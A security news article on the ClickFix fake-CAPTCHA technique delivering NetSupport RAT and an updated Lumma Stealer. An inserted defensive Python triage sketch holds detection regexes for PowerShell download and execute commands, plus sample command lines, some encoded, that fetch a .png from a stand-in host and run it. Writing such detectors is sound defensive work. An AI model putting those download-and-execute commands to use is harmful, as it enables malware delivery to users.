Threat actors have been observed using the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025.
NetSupport RAT, sometimes propagated via bogus websites and fake browser updates, grants attackers full control over the victim’s host, allowing them to monitor the system’s screen in real time, control the keyboard and mouse, upload and download files, and launch and execute malicious commands.
Originally known as NetSupport Manager, it was developed as a legitimate remote IT support program, but has since been repurposed by malicious actors to target organizations and capture sensitive information, including screenshots, audio, video, and files.
“ClickFix is a technique used by threat actors to inject a fake CAPTCHA webpage on compromised websites, instructing users to follow certain steps to copy and execute malicious PowerShell commands on their host to download and run malware payloads,” eSentire said in an analysis.
In the attack chains identified by the cybersecurity company, the PowerShell command is used to download and execute the NetSupport RAT client from a remote server that hosts the malicious components in the form of PNG image files.
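For defenders, the chain described above leaves a recognizable trace in process-creation telemetry: a PowerShell process whose command line fetches a URL ending in .png and then executes something. The following triage sketch is an added example, not code from eSentire or from the original report; the event layout, the pattern lists, the function names and the example.test sample records are all assumptions constructed for illustration.

```python
import base64
import re

# Constructed heuristics for illustration; tune against your own telemetry.
DOWNLOAD = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|"
                      r"start-bitstransfer|downloadfile|downloadstring)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I)
PNG_URL = re.compile(r"https?://[^\s'\"|;)]+\.png\b", re.I)
ENCODED = re.compile(r"(?<!\S)-(?:e|ec|en|enc|enco\w*)\s+([A-Za-z0-9+/=]{16,})", re.I)
PS_IMAGE = re.compile(r"(?:^|[\\/])(powershell|pwsh)(\.exe)?$", re.I)


def expand(cmdline):
    """Return the command line plus any decoded -EncodedCommand payload."""
    text = cmdline
    for blob in ENCODED.findall(cmdline):
        try:
            text += " " + base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:  # not base64 / not UTF-16LE: keep the raw text only
            pass
    return text


def triage(event):
    """Return 'high', 'review' or None for one process-creation record."""
    if not PS_IMAGE.search(event["image"]):
        return None
    text = expand(event["cmdline"])
    if not (PNG_URL.search(text) and DOWNLOAD.search(text)):
        return None
    # Fetching a .png is common; fetching one and then executing is not.
    return "high" if EXECUTE.search(text) else "review"


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_enc = base64.b64encode(
    "iex (irm https://files.example.test/2.png)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [  # constructed records, not taken from the eSentire report
    {"image": PS, "cmdline": "powershell -w hidden -c \"iwr https://files.example.test/1.png "
                             "-OutFile $env:TEMP\\c.exe; Start-Process $env:TEMP\\c.exe\""},
    {"image": PS, "cmdline": f"powershell -NoP -enc {_enc}"},
    {"image": PS, "cmdline": "powershell Invoke-WebRequest https://intranet.example.test/logo.png -OutFile logo.png"},
    {"image": PS, "cmdline": "powershell Get-ChildItem C:\\Users"},
    {"image": r"C:\Program Files\Browser\browser.exe", "cmdline": "browser https://files.example.test/1.png"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev), "|", ev["cmdline"][:70])
```

The "review" tier exists because legitimate scripts also download images; only the combination with an execution primitive is scored "high".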
The development comes as the ClickFix technique is also being used to propagate an updated version of the Lumma Stealer malware that uses the ChaCha20 cipher for decrypting a configuration file containing the list of command-and-control (C2) servers.
“These changes provide insight into the evasive tactics employed by the developer(s) who are actively working to bypass current extraction and analysis tools,” eSentire said.